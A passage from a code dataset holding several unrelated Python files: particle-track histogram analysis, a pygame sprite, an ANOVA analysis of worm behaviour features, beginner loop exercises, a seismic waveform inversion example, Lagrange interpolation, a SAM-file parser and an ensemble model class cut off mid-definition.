[MHz]\")\n plt.ylabel(\"Counts\")\n plt.legend(loc='upper right',fontsize='small')\n plt.text(ax[0]+3,ax[3]-(ax[3]-ax[2])/5,'Event Sequences with %d peaks\\n(%d/%d events)' % (nb_tracks,np.sum(cut_good),len(np.unique(data['candidate_tracks']['UniqueEventID']))))\n\n if flag_save_fig:\n plt.gcf().set_size_inches(15,10)\n figname2 = figname1+'_HistWithNumberOfTracks'\n plt.savefig(figname2+'.pdf',format='pdf',pad_inches=0.1)\n plt.show()\n\n\n\nif False:\n plt.figure(50)\n plt.clf()\n for ii,nb_tracks in enumerate(np.unique(data['candidate_tracks']['MultiPeakTracks_Total'])):\n if nb_tracks>1:\n cut_nb_tracks = data['candidate_tracks']['MultiPeakTracks_Total']==nb_tracks\n tracks_freq = data['candidate_tracks']['StartFrequency'][cut_nb_tracks]/1e6\n plt.hist(tracks_freq,np.arange(0,200,1))\n\n\nif flag_look_at_sidebands:\n plt.figure(60)\n plt.clf()\n\n plt.figure(70)\n plt.clf()\n colorlist = ['darkgreen','blue']\n\n nb_sigma = 5\n max_counts_in_fbins = 0\n max_counts_in_ebins = 0\n tracks_freq_MHz = data['candidate_tracks']['StartFrequency']/1e6+fbins_min\n tracks_freq_Hz = data['candidate_tracks']['StartFrequency']+data['metadata']['minimum_frequency'][0]+run_params['freq_mixer_hi']\n tracks_ene = ana.Freq2Energy(tracks_freq_Hz, run_params['b_avg_total_T'])\n cut_seq = data['candidate_tracks']['EventSequenceID']==0\n for i in np.arange(1,3):\n if i==1:\n nb_tracks=2\n track_n=0\n ebins_w=0.0002\n if i==2:\n nb_tracks=2\n track_n=1\n ebins_w=0.005\n fbins_MHz = np.arange(fbins_min,fbins_max+fbins_w,fbins_w)\n ebins_keV = np.arange(np.min(tracks_ene),np.max(tracks_ene),ebins_w)\n #f_range_MHz = results['mu'][nb_tracks][track_n] + (np.array([-1,1])*nb_sigma*results['sigma'][nb_tracks][track_n])\n f_range_MHz = results['mu'][nb_tracks][track_n] + np.array([-5,10])\n cut_f = (tracks_freq_MHz>f_range_MHz[0]) & (tracks_freq_MHz=t_range[0]) & (data['candidate_tracks']['StartTimeInAcq']*1e3<=t_range[1])\n # Select only 3-track MTP tracks\n cut_good = cut_track_0 & cut_t\n if False:\n nb_tracks = 3\n cut_nb_tracks = (data['candidate_tracks']['MultiPeakTracks_Total']==nb_tracks)\n cut_good = cut_track_0 & cut_t & cut_nb_tracks\n cut_f_data = fdata[cut_good]\n\n # Set these according to figure(40) results\n nb_sigma = 3\n\n # Central peak identification - call it cp\n\n f_range_MHz_cp = results['mu'][2][0]+np.array([-1,1])*nb_sigma*results['sigma'][2][0]\n\n # Rightmost (highest frequency) sideband identification - call it s2\n\n f_range_MHz_s2 = results['mu'][2][1]+np.array([-1,1])*nb_sigma*results['sigma'][2][1]\n\n s1_cut = np.zeros_like(cut_f_data,dtype=bool)\n cp_cut = np.zeros_like(cut_f_data,dtype=bool)\n s2_cut = np.zeros_like(cut_f_data,dtype=bool)\n\n for i,value in np.ndenumerate(cut_f_data):\n # Check for cp\n if value >= f_range_MHz_cp[0] and value <= f_range_MHz_cp[1]:\n s1_cut[i] = False\n cp_cut[i] = True\n s2_cut[i] = False\n # Check for s2\n elif value >= f_range_MHz_s2[0] and value <= f_range_MHz_s2[1]:\n s1_cut[i] = False\n cp_cut[i] = False\n s2_cut[i] = True\n\n #################################################################################################################################\n if False:\n # Now to identify which sidebands belong to which central peaks...\n # Recall that all tracks in the same MultiPeakTrack or Sequence have the same EventSequenceID, but since this is already set to zero for all the cut tracks it doesn't help us\n # However, \"UniqueEventID combines AcqIDInDSet and EventID to create a unique ID for each event inside a run\" from P8MiscAnalysis.py - we'll use this\n\n cut_UniqueEventID = data['candidate_tracks']['UniqueEventID'][cut_good]\n\n\n # Just to take a look at where bands sit within UniqueEventID\n plt.figure(100)\n plt.clf()\n plt.xlabel('Index')\n plt.ylabel('UniqueEventID')\n plt.plot(cut_UniqueEventID,'wo') \n\n for i, value in np.ndenumerate(cut_UniqueEventID):\n if s1_cut[i] == True:\n plt.plot(i,value,'g+') \n for i, value in np.ndenumerate(cut_UniqueEventID):\n if cp_cut[i] == True:\n plt.plot(i,value,'b+')\n for i, value in np.ndenumerate(cut_UniqueEventID):\n if s2_cut[i] == True:\n plt.plot(i,value,'r+')\n \n plt.show()\n\n # ... seems like there are not a lot (actual almost none at all) which have two sidebands and a central peak (as defined by the above criteria)\n # this means that, although we've elected only to look 3-track MTP tracks, most of them have either one sideband or the other present, or no central peak and only sidebands\n\n #################################################################################################################################\n\n # Getting energy\n\n tracks_freq_Hz = data['candidate_tracks']['StartFrequency']+data['metadata']['minimum_frequency'][0]+run_params['freq_mixer_hi'] # see Luiz' session line 395\n tracks_ene = ana.Freq2Energy(tracks_freq_Hz, run_params['b_avg_total_T'])\n cut_e_data = tracks_ene[cut_good] # apply same cut as for frequency\n\n plt.figure(101)\n #plt.scatter(cut_e_data,cut_f_data,c='w')\n plt.xlabel(\"Track Energy [keV]\")\n plt.ylabel(\"Track Frequency [MHz]\")\n plt.title('{} keV peak, run_id = {}'.format(run_params['peak_e_keV'],run_params['run_id']))\n\n for i, value in np.ndenumerate(cut_e_data):\n if cp_cut[i] == True:\n plt.scatter(cut_e_data[i],cut_f_data[i],c='g')\n for i, value in np.ndenumerate(cut_e_data):\n if s2_cut[i] == True:\n plt.scatter(cut_e_data[i],cut_f_data[i],c='r')\n\n plt.show()\n \n\n\n\n\n","sub_path":"PhaseI/MTP_session_prospectus/v00_081516/17keV/run_id_294/MPT_session_294.py","file_name":"MPT_session_294.py","file_ext":"py","file_size_in_byte":26467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"152310126","text":"import pygame\nfrom pygame.sprite import Sprite \nimport time\n\nclass Fan(Sprite):\n\tdef __init__(self, screen):\n\t\tsuper(Fan,self). __init__()\n\t\tself.image = pygame.image.load(\"fan_image.png\")\n\t\t#self.rect = pygame.Rect(100, 100, 50, 100)\n\t\tself.rect = self.image.get_rect()\n\t\tself.x = 0\n\t\tself.y = 575\n\t\tself.dx = 10\n\t\tself.width = 47\n\t\tself.height = 85\n\t\tself.speed = 10\n\t\tself.screen = screen\n\t\tself.direction = 1\n\t\t# self.stunned = False\n\t\t# self.when_stunned = time.time()\n\n\tdef draw_me(self):\n\t\t#self.rect = pygame.Rect(self.x, self.y, self.width, self.height)\n\t\tself.rect.left = self.x -20\n\t\tself.rect.right = self.x + 20\n\t\tself.rect.top = self.y -20\n\t\tself.rect.bottom = self.y +20\n\t\tself.screen.blit(self.image, [self.x, self.y])","sub_path":"Fan.py","file_name":"Fan.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"293728006","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 13 16:45:47 2017\n\n@author: ajaver\n\"\"\"\n\nimport os\nimport itertools\nimport pandas as pd\nimport numpy as np\nfrom functools import partial\n\nfrom sklearn.manifold import TSNE\nfrom sklearn.decomposition import PCA, SparsePCA, FastICA\nfrom matplotlib.backends.backend_pdf import PdfPages\n\nimport statsmodels.stats.multitest as smm\nfrom scipy.stats import ttest_ind\nimport seaborn as sns\nimport matplotlib.pylab as plt\nfrom scipy.stats import f_oneway\n\n#from tierpsy_features.features import timeseries_columns, ventral_signed_columns, morphology_columns\n\n#%%\ndef _anova_analysis(feat_means_df, feats2check, pairs2compare = None):\n feat_strain_g = feat_means_df.groupby('strain')\n #anova test\n stats = []\n for feat in feats2check:\n dat = [g[feat].dropna().values for _, g in feat_strain_g]\n fstats, pvalue = f_oneway(*dat)\n\n #get the degree's of freedom. I got this formulas from the f_oneway scipy repo\n #prob = special.fdtrc(dfbn, dfwn, f) # equivalent to stats.f.sf\n bign = sum(x.size for x in dat)\n num_groups = len(dat)\n dfbn = num_groups - 1\n dfwn = bign - num_groups\n \n stats.append((feat, fstats, pvalue, dfbn, dfwn))\n feat, fstats, pvalue, df1, df2 = zip(*stats)\n fstatistics = pd.DataFrame(list(zip(fstats, pvalue, df1, df2)), \n index=feat, columns=['fstat', 'pvalue', 'df1', 'df2'])\n \n reject, pvals_corrected, alphacSidak, alphacBonf = \\\n smm.multipletests(fstatistics['pvalue'].values, method = 'fdr_tsbky')\n fstatistics['pvalue_adj'] = pvals_corrected\n \n #pairwise comparsion\n all_comparisons = []\n if pairs2compare is None:\n pairs2compare = list(itertools.combinations(feat_strain_g.groups.keys(), 2))\n \n for x1,x2 in pairs2compare:\n a = feat_strain_g.get_group(x1).dropna()\n b = feat_strain_g.get_group(x2).dropna()\n \n for feat in feats2check:\n tstatistic, pvalue = ttest_ind(a[feat].values, b[feat].values)\n all_comparisons.append((x1, x2, feat, tstatistic, pvalue))\n \n multi_comparisons = pd.DataFrame(all_comparisons, \n columns=['strain1', 'strain2', 'feat', 'tstatistic', 'pvalue'])\n \n reject, pvals_corrected, alphacSidak, alphacBonf = \\\n smm.multipletests(multi_comparisons['pvalue'].values, method = 'fdr_tsbky')\n multi_comparisons['pvalue_adj'] = pvals_corrected\n\n return fstatistics, multi_comparisons\n#%%\nif __name__ == '__main__':\n save_dir_root = './anova_tests'\n\n \n comparsions_keys = dict(\n N2 = (\n ['N2_Ctrl_Day7','N2_Ti5_Day7', 'N2_Fe5_Day7'], \n [('N2_Ctrl_Day7', 'N2_Ti5_Day7'), \n ('N2_Ctrl_Day7', 'N2_Fe5_Day7')\n ]\n ),\n NL5901 = (\n ['NL5901_Ctrl_Day7', 'NL5901_Ti5_Day7', 'NL5901_Fe5_Day7'], \n [('NL5901_Ctrl_Day7', 'NL5901_Ti5_Day7'), \n ('NL5901_Ctrl_Day7', 'NL5901_Fe5_Day7')\n ]\n )\n \n )\n \n save_dir = '/Users/ajaver/OneDrive - Imperial College London/tierpsy_features/results/dementia_nanoparticles'\n feat_fname = os.path.join(save_dir, 'nell_tierpsy_features.csv')\n feat_means_df = pd.read_csv(feat_fname, index_col=False)\n index_cols = ['Unnamed: 0', 'id', 'strain', 'n_worms', 'directory', 'base_name', 'exp_name']\n \n feats2check = [x for x in feat_means_df if x not in index_cols]\n feats2check = [x for x in feats2check if 'IQR' not in x]\n \n for comparison_type, (strain_order, pairs2compare) in comparsions_keys.items():\n save_dir = os.path.join(save_dir_root, comparison_type)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n \n print(comparison_type)\n df = feat_means_df[feat_means_df['strain'].isin(strain_order)]\n fstatistics, multi_comparisons = _anova_analysis(df, feats2check, pairs2compare = None)\n fstatistics = fstatistics.sort_values(by='pvalue_adj')\n\n #%%\n \n save_name = os.path.join(save_dir, 'boxplot.pdf')\n with PdfPages(save_name) as pdf_pages:\n for feat, row in fstatistics.iterrows():\n f, ax = plt.subplots(figsize=(15, 6))\n sns.boxplot(x ='strain', \n y = feat, \n data = feat_means_df, \n order= strain_order\n )\n sns.swarmplot(x ='strain', y = feat, data = feat_means_df, color=\".3\", linewidth=0, order= strain_order)\n ax.xaxis.grid(True)\n ax.set(ylabel=\"\")\n sns.despine(trim=True, left=True)\n \n args = (feat, int(row['df1']), int(row['df2']), row['fstat'], row['pvalue'])\n strT = '{} | f({},{})={:.3} | (p-value {:.3})'.format(*args)\n plt.suptitle(strT)\n plt.xlabel('')\n \n pdf_pages.savefig()\n plt.close()\n #%%\n dd = {x:ii for ii,x in enumerate(fstatistics.index)}\n multi_comparisons['m'] = multi_comparisons['feat'].map(dd)\n multi_comparisons = multi_comparisons.sort_values(by='m')\n del multi_comparisons['m']\n \n save_name = os.path.join(save_dir, 'pair_comparisons.csv')\n multi_comparisons.to_csv(save_name, index=False)\n#%% \n\n\n \n# #%%\n# strain_order = ['N2', 'DAG356', \n# 'TR2171', 'DAG618', \n# 'DAG658', 'DAG680', \n# 'DAG515', 'DAG675', \n# 'DAG666', 'DAG667', 'DAG668', 'DAG676', \n# 'DAG677', 'DAG678', 'DAG679']\n# cols_ind = [0, 0, \n# 1, 1, \n# 2, 2, \n# 3, 3, \n# 4, 4, 4, 4, 4, 4, 4]\n# \n# \n# current_palette = sns.color_palette()\n# cols = [current_palette[x] for x in cols_ind]\n# assert len(strain_order) == len(cols)\n# col_dict = {k:v for k,v in zip(strain_order, cols)}\n# \n# \n# \n# #%%\n# if True:\n# #median_values = feat_strain_g.median()\n# \n# save_name = os.path.join('{}/boxplot_anova.pdf'.format(save_dir))\n# with PdfPages(save_name) as pdf_pages:\n# for feat, row in stat_values.iterrows():\n# \n# f, ax = plt.subplots(figsize=(15, 6))\n# sns.boxplot(x ='strain', \n# y = feat, \n# data = feat_means_df, \n# order= strain_order,\n# palette = col_dict\n# )\n# sns.swarmplot(x ='strain', y = feat, data = feat_means_df, color=\".3\", linewidth=0, order= strain_order)\n# ax.xaxis.grid(True)\n# ax.set(ylabel=\"\")\n# sns.despine(trim=True, left=True)\n# plt.suptitle('{} (p-value {:.3})'.format(feat, row['pvalue']))\n# plt.xlabel('')\n# \n# #dd = median_values[feat].argsort()\n# #strain_order = list(dd.index[dd.values])\n# #n2_ind = strain_order.index('N2')\n# #plt.plot((n2_ind,n2_ind), plt.ylim(), '--k', linewidth=2)\n# \n# pdf_pages.savefig()\n# plt.close(f)\n# \n# #%%\n# df = feat_means_df.dropna()\n# \n# valid_feats = [x for x in feat_means_df if x not in ['strain'] ]\n# X = df[valid_feats].values.copy()\n# \n# x_min, x_max = np.min(X, 0), np.max(X, 0)\n# X = (X - x_min)/(x_max - x_min)\n# \n# #X = (X - np.mean(X, 0))/np.std(X, 0)\n# #%%\n# pca = PCA()\n# X_pca = pca.fit_transform(X)\n# \n# pca_s = SparsePCA()\n# X_pca_s = pca_s.fit_transform(X)\n# #%%\n# \n# #for p in [5, 8, 10, 12, 15, 20, 30]:\n# tsne = TSNE(n_components=2, \n# #perplexity = p,\n# init='pca',\n# verbose=1, \n# n_iter=10000\n# )# random_state=0)\n# X_tsne = tsne.fit_transform(X)\n# \n# plt.figure()\n# plt.plot(X_tsne[:, 0], X_tsne[:, 1], 'o')\n# #%%\n# from matplotlib.lines import Line2D\n# import itertools\n# \n# marker_cycle = itertools.cycle(Line2D.filled_markers)\n# mks = [next(marker_cycle) for _ in strain_order]\n# #%%\n# save_name = os.path.join('{}/clustering.pdf'.format(save_dir))\n# with PdfPages(save_name) as pdf_pages:\n# \n# dat = {'t-SNE':X_tsne, 'PCA':X_pca, 'PCA_Sparse':X_pca_s}\n# #%%\n# for k,Xp in dat.items():\n# \n# \n# X_df = pd.DataFrame(Xp[:, 0:2], columns=['X1', 'X2'])\n# X_df['strain'] = df['strain'].values\n# \n# g = sns.lmplot('X1', # Horizontal axis\n# 'X2', # Vertical axis\n# data=X_df, # Data source\n# fit_reg=False, # Don't fix a regression line\n# hue = 'strain',\n# hue_order = strain_order,\n# palette = col_dict,\n# size= 8,\n# scatter_kws={\"s\": 100},\n# legend=False,\n# aspect = 1.2,\n# markers = mks\n# )\n# \n# box = g.ax.get_position() # get position of figure\n# g.ax.set_position([box.x0, box.y0, box.width * 0.8, box.height]) # resize position\n# \n# g.ax.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n# plt.title(k)\n# pdf_pages.savefig()\n# \n# plt.close('all') \n# #%%\n# \n# strT = 'PCA'\n# Xr = X_pca\n# \n# save_name = os.path.join('{}/{}.pdf'.format(save_dir, strT))\n# with PdfPages(save_name) as pdf_pages:\n# \n# plt.figure()\n# plt.plot(np.cumsum(pca.explained_variance_ratio_), '.')\n# plt.title('Explained Variance')\n# pdf_pages.savefig()\n# \n# for n in range(10):\n# df['p_dist'] = Xr[:, n]\n# \n# f, ax = plt.subplots(figsize=(15, 6))\n# \n# sns.boxplot(x = 'strain', \n# y = 'p_dist', \n# data = df, \n# order= strain_order,\n# palette = col_dict\n# )\n# sns.swarmplot(x = 'strain', \n# y = 'p_dist', \n# data = df,\n# color=\".3\", \n# linewidth=0, \n# order= strain_order\n# )\n# \n# plt.title('{}_{} var explained: {:.2}'.format(strT, n+1, pca.explained_variance_ratio_[n]))\n# pdf_pages.savefig()\n# \n# plt.close('all')\n# #%%\n# \n# strT = 'PCA_Sparse'\n# Xr = X_pca_s\n# \n# save_name = os.path.join('{}/{}.pdf'.format(save_dir, strT))\n# with PdfPages(save_name) as pdf_pages:\n# #http://www.tandfonline.com/doi/pdf/10.1198/106186006X113430?needAccess=true\n# q, r = np.linalg.qr(X_pca_s)\n# explained_variance = np.diag(r)**2\n# explained_variance_ratio = explained_variance/np.sum(explained_variance)\n# \n# plt.figure()\n# plt.plot(np.cumsum(explained_variance_ratio), '.')\n# plt.title('Explained Variance')\n# pdf_pages.savefig()\n# \n# \n# for n in range(10):\n# df['p_dist'] = Xr[:, n]\n# #df['p_dist'] = np.linalg.norm((X_pca - n2_m)[:,:(n+1)], axis=1)\n# \n# f, ax = plt.subplots(figsize=(15, 6))\n# \n# sns.boxplot(x = 'strain', \n# y = 'p_dist', \n# data = df, \n# order= strain_order,\n# palette = col_dict\n# )\n# sns.swarmplot(x = 'strain', \n# y = 'p_dist', \n# data = df,\n# color=\".3\", \n# linewidth=0, \n# order= strain_order\n# )\n# \n# pca_s.components_[0, :]\n# plt.title('{}_{} var explained: {:.2}'.format(strT, n+1, explained_variance_ratio[n]))\n# pdf_pages.savefig()\n# \n# plt.close('all')\n# #%%\n# save_name = os.path.join('{}/{}.txt'.format(save_dir, strT))\n# with open(save_name, 'w') as fid:\n# for n in range(10):\n# vec = pca_s.components_[n, :]\n# inds, = np.where(vec!=0)\n# dd = [(valid_feats[ii],vec[ii]) for ii in inds]\n# \n# fid.write('***** PCA Sparse {} *****\\n'.format(n+1))\n# for feat in sorted(dd):\n# fid.write('{} {:.3}\\n'.format(*feat))\n# fid.write('\\n')\n ","sub_path":"dementia_nanoparticles/anova.py","file_name":"anova.py","file_ext":"py","file_size_in_byte":12897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"268515703","text":"#nums = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nnums = range(11)\naccum = 0\nfor w in nums:\n\taccum = accum + w\n\tprint (accum)\nprint (\"range(0,5): \")\nfor i in range(0, 5):\n\tprint (i)\nprint (\"range(5): \")\nfor i in range(5):\n print (i)\nprint (list(range(5)))\nprint (list(range(0,5)))\nprint(range(0,5))\nnumbers = range(41)\nsum1 = 0\nfor sum in numbers:\n sum1 =sum1 + sum\nprint (sum1)\nstr1 = \"I like nonsense, it wakes up the brain cells. Fantasy is a necessary ingredient in living.\"\nnumbs = 0\nfor character in str1:\n numbs += 1\nprint(numbs)\nfruits = ['apple', 'pear', 'apricot', 'cherry', 'peach']\nfor n in range(len(fruits)):\n print(n, fruits[n])\n\ns = input(\"Enter some text\") #The Accumulator Pattern with Strings\nac = \"\"\nfor c in s:\n ac = ac + c + \"-\" + c + \"-\"\n\nprint(ac)","sub_path":"accumulatorpattern.py","file_name":"accumulatorpattern.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"286041468","text":"# Std import block\nimport time\nimport os\nimport copy\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom pysit import *\nfrom pysit.gallery import triangular_reflector\n\nif __name__ == '__main__':\n # Setup\n frequencySolver = True\n hybrid=False\n\n nRcv = 80\n # enable Open MP multithread solver\n os.environ[\"OMP_NUM_THREADS\"] = \"16\"\n \n # Define Domain\n pmlx = PML(0.1, 100)\n pmlz = PML(0.1, 100)\n\n x_config = (-1.0, 1.0, pmlx, pmlx)\n z_config = (-1.0, 1.0, pmlz, pmlz)\n\n d = RectangularDomain(x_config, z_config)\n\n m = CartesianMesh(d, 201, 201)\n\n # Generate true wave speed\n C, C0, m, d = triangular_reflector(m,reflector_width = [0.05, 0.05], reflector_position =[(0.0, -0.2), (0.0, 0.2)])\n\n \n h = 2*np.pi/nRcv\n xRcv = np.sin(np.linspace(0, 2*np.pi-h, nRcv)) \n zRcv = np.cos(np.linspace(0, 2*np.pi-h, nRcv)) \n\n radiousSrc = 0.75\n\n source_list = []\n for x,z in zip(xRcv, zRcv):\n source_list.append(PointSource(m, (radiousSrc*x, radiousSrc*z), \n RickerWavelet(10.0), intensity = 1.0))\n \n #2 PointSource objects are defined above. Group them together in a single SourceSet\n source_set = SourceSet(m,source_list)\n\n radiousRcv = 0.5\n\n receivers = ReceiverSet(m, [PointReceiver(m, (radiousRcv*x[0], radiousRcv*x[1])) for x in zip(xRcv, zRcv)])\n\n shots = []\n for source in source_list:\n receiverscopy = copy.deepcopy(receivers)\n shots.append(Shot(source, receiverscopy))\n\n\n if frequencySolver:\n solver = ConstantDensityHelmholtz(m, spatial_accuracy_order=6)\n frequencies = [2.5, 5.0, 10.0]\n\n # Generate synthetic Seismic data\n print('Generating data...')\n base_model = solver.ModelParameters(m,{'C': C})\n tt = time.time()\n generate_seismic_data(shots, solver, base_model, frequencies=frequencies)\n print('Data generation: {0}s'.format(time.time()-tt))\n\n else:\n # Define and configure the wave solver\n trange = (0.0,3.0)\n\n solver_time = ConstantDensityAcousticWave(m,\n spatial_accuracy_order=6,\n kernel_implementation='omp',\n trange=trange)\n # Generate synthetic Seismic data\n print('Generating data...')\n base_model = solver_time.ModelParameters(m,{'C': C})\n tt = time.time()\n generate_seismic_data(shots, solver_time, base_model)\n print('Data generation: {0}s'.format(time.time()-tt))\n\n # Define and configure the objective function\n if hybrid:\n solver = ConstantDensityAcousticWave(m,\n spatial_accuracy_order=4,\n trange=trange)\n objective = HybridLeastSquares(solver)\n else:\n\n solver = ConstantDensityHelmholtz(m,\n spatial_accuracy_order=4)\n objective = FrequencyLeastSquares(solver)\n\n # Define the inversion algorithm\n invalg = LBFGS(objective)\n initial_value = solver.ModelParameters(m,{'C': C0})\n\n # Execute inversion algorithm\n print('Running Descent...')\n tt = time.time()\n\n status_configuration = {'value_frequency' : 1,\n 'residual_frequency' : 1,\n 'residual_length_frequency' : 1,\n 'objective_frequency' : 1,\n 'step_frequency' : 1,\n 'step_length_frequency' : 1,\n 'gradient_frequency' : 1,\n 'gradient_length_frequency' : 1,\n 'run_time_frequency' : 1,\n 'alpha_frequency' : 1,\n }\n invalg.max_linesearch_iterations=20\n\n #loop_configuration=[(60,{'frequencies' : [2.0, 3.5, 5.0]}), (15,{'frequencies' : [6.5, 8.0, 9.5]})] #3 steps at one set of frequencies and 3 at another set\n\n # loop_configuration=[(40,{'frequencies' : [10.0]}),\n # (20,{'frequencies' : [20.0]}), \n # (5,{'frequencies' : [40.0]})]\n\n loop_configuration=[(20,{'frequencies' : [2.5]}),\n (10,{'frequencies' : [5.0]}),\n (10,{'frequencies' : [10.0]})]\n\n result = invalg(shots, initial_value, loop_configuration, verbose=True, status_configuration=status_configuration)\n\n print('...run time: {0}s'.format(time.time()-tt))\n\n obj_vals = np.array([v for k,v in list(invalg.objective_history.items())])\n\n plt.figure()\n plt.semilogy(obj_vals)\n\n fig = plt.gcf()\n fig.set_size_inches(18.5, 10.5)\n plt.savefig('decay_triangle_small.png')\n\n plt.figure()\n plt.subplot(3,1,1)\n vis.plot(C0, m)\n plt.title('Initial Model')\n plt.subplot(3,1,2)\n vis.plot(C, m)\n plt.title('True Model')\n plt.subplot(3,1,3)\n vis.plot(result.C, m)\n plt.title('Reconstruction')\n\n fig = plt.gcf()\n fig.set_size_inches(4, 12)\n\n plt.savefig('reconstruction_triangle_small.png')\n #plt.show()\n\n","sub_path":"examples/triangle_reflectors_halfwavelength.py","file_name":"triangle_reflectors_halfwavelength.py","file_ext":"py","file_size_in_byte":5208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"199981587","text":"from Tabulirovanie_transtsendentnykh_funktsiy import *\nimport matplotlib.pyplot as plt\n\nfrom scipy.special import *\nfrom scipy.integrate import quad\n\ndef SecondTask(count):\n n = count\n print('Всего точек узловых = {}'.format(n))\n \n x = np.linspace(0, 2, n)\n f = np.array(FirstTaskWithParametrs(x, 0.000001))\n print ('Узловые точки и f(x)')\n for i in range(len(x)):\n print('f({:.3f})={:.6f}' .format( x[i], f[i]))\n xMiddle = [x[i] + (x[i] - x[i - 1]) / 2 for i in range(1, len(x) - 1)]\n xMiddle.insert(0, 0)\n xMiddle = np.array(xMiddle)\n fInMiddle = np.array(FirstTaskWithParametrs(xMiddle, 0.000001))\n print('Серединные точки и f(x)')\n for i in range(len(xMiddle)):\n print('f({:.3f})={:.6f}'.format(xMiddle[i], fInMiddle[i]))\n nMiddle=len(xMiddle)\n print('Всего точек узловых = {}'.format(nMiddle))\n\n def Ln(currentX):\n S=0\n for i in range(n):\n proiz=1\n for j in range(n):\n if i!=j:\n proiz*=(currentX-x[j])/(x[i]-x[j])\n S+=proiz*f[i]\n return S\n L=np.array([Ln(xi) for xi in xMiddle])\n difference = abs(fInMiddle - L)\n print('Максимальное значение погрешности интерполирования = {}'.format(max(difference)))\n return x, f, L, difference\n","sub_path":"я2.py","file_name":"я2.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"527845928","text":"num=int(input())\narr=[]\nres=[]\nfor i in range(0,num*2):\n arr=arr+[input()]\nk=0\nb=False\nfor p in range(0,num):\n k=0\n for i in range(0,len(arr[2*p])):\n b = False\n for j in range(0,len(arr[2*p+1])):\n j=j+k\n if arr[2*p][i:i+1]==arr[2*p+1][j:j+1]:\n if arr[2*p][i:i+1]==arr[2*p+1][j+1:j+2]:\n break\n else:\n b=True\n k=j\n break\n if not b:\n break\n if b:\n print('YES')\n else:\n print('NO')\n\n\n\n\n","sub_path":"Code/CodeRecords/2972/60644/254232.py","file_name":"254232.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"139276131","text":"import explanes as el\n\nif __name__ == \"__main__\":\n el.experiment.run()\n\ndef set(args):\n experiment = el.Experiment()\n experiment.factor.factor1=[1, 3]\n experiment.factor.factor2=[2, 4]\n return experiment\n\ndef step(setting, experiment):\n print(setting)\n","sub_path":"examples/examples/experiment_run.py","file_name":"experiment_run.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"160184424","text":"# Please change this according to the directory you are currently using.\n# Please revise the \"files_to_parse.txt\" accordingly.\nlist_of_files = \"/u/home/s/shahar/anaconda3/research/consistency_read_aligners/unmapped/nresults/files.txt\"\n# This opens the \"files_to_parse.txt\", this is the list of files that we want to parse.\nf = open(list_of_files, \"r\")\n# This opens the file that we're going to write the data to.\nfinalFile = open(\"Final.txt\", \"w+\")\n# This for loop runs for each file in the list of files.\nfor file in f:\n # This line takes off the new line at the end of the string.\n file = file[:-1]\n # This is to visually check what files have actually been run.\n print(file)\n # This opens the current sam file to read.\n currFile = open(file, 'r')\n # Checking to see if we're in read mode.\n if currFile.mode == \"r\":\n # We then read the whole file line by line into a list of lines.\n lines = currFile.readlines()\n # This closes the current file so we don't have an issue when we open a new current file.\n currFile.close()\n # This just sets the flag to false for something up ahead.\n flag = False\n # For each line in the file we're going to sift through the line to get the information that we want.\n # What we want is to know whether the reads have been mapped or not mapped. A \"*\" means unmapped and \"REFERENCE\" means mapped.\n for line in lines:\n # So! We've finally gotten to the flag.\n # Essentially the flag is there to help identify the actual tool that we are using.\n # Before looking at the reads, the program will to identify what the tool they're currently looking at is.\n # Therefore, every line that it looks at, it looks for an \"ID:\". Currently this is flawed as many tools\n # can have multiple \"ID:\". Thus it is still a work in progress. (10/25/2019)\n # Yet, if it finds the ID, then we know that the reads are coming next. Thus, we take the reads after that by\n # setting the flag to be true. This will be improved.\n if line.find(\"ID:\") != -1:\n # Splits the line string and places the pieces of that string into a list.\n lineList = line.split()\n # Writes to identity of the tool to the file.\n finalFile.write(lineList[1])\n finalFile.write(\", \")\n # The famous flag\n flag = True\n # This runs if it is a line that starts with the read identifier.\n elif flag:\n # This splits the line to make a list that is easier to work with.\n lineList = line.split()\n # Currently this program is flawed (10/25/2019). I will be working to make this portion\n # format to a csv file.\n # CSV formatting\n finalFile.write(\", \")\n # We then take the third item in the list which is either a \"*\" or a \"REFERENCE\" depending on\n # whether it was mapped or unmapped.\n finalFile.write(lineList[2])\n else:\n continue\n # Formatting\n finalFile.write(\"\\n\")\n#Closes the open files\nf.close()\nfinalFile.close()\n","sub_path":"unmapped/fileTranslator.py","file_name":"fileTranslator.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"457281454","text":"from abc import ABC, abstractmethod\nfrom concurrent.futures.process import ProcessPoolExecutor\nfrom typing import Sequence, List\nfrom inspect import currentframe, getframeinfo\n\nimport pandas as pd\n\nfrom ..vector_model import VectorModel\nfrom ..util.multiprocessing import VectorModelWithSeparateFeatureGeneration\nfrom ..util.pickle import PickleFailureDebugger\n\n\nclass EnsembleVectorModel(VectorModel, ABC):\n def __init__(self, models: Sequence[VectorModel], numProcesses=1):\n \"\"\"\n :param models:\n :param numProcesses:\n \"\"\"\n self.numProcesses = numProcesses\n self.models = list(models)\n super().__init__(checkInputColumns=False)\n\n def _fit(self, X: pd.DataFrame, Y: pd.DataFrame):\n if self.numProcesses == 1 or len(self.models) == 1:\n for model in self.models:\n model.fit(X, Y)\n return\n\n fittedModelFutures = []\n executor = ProcessPoolExecutor(max_workers=self.numProcesses)\n fitters = 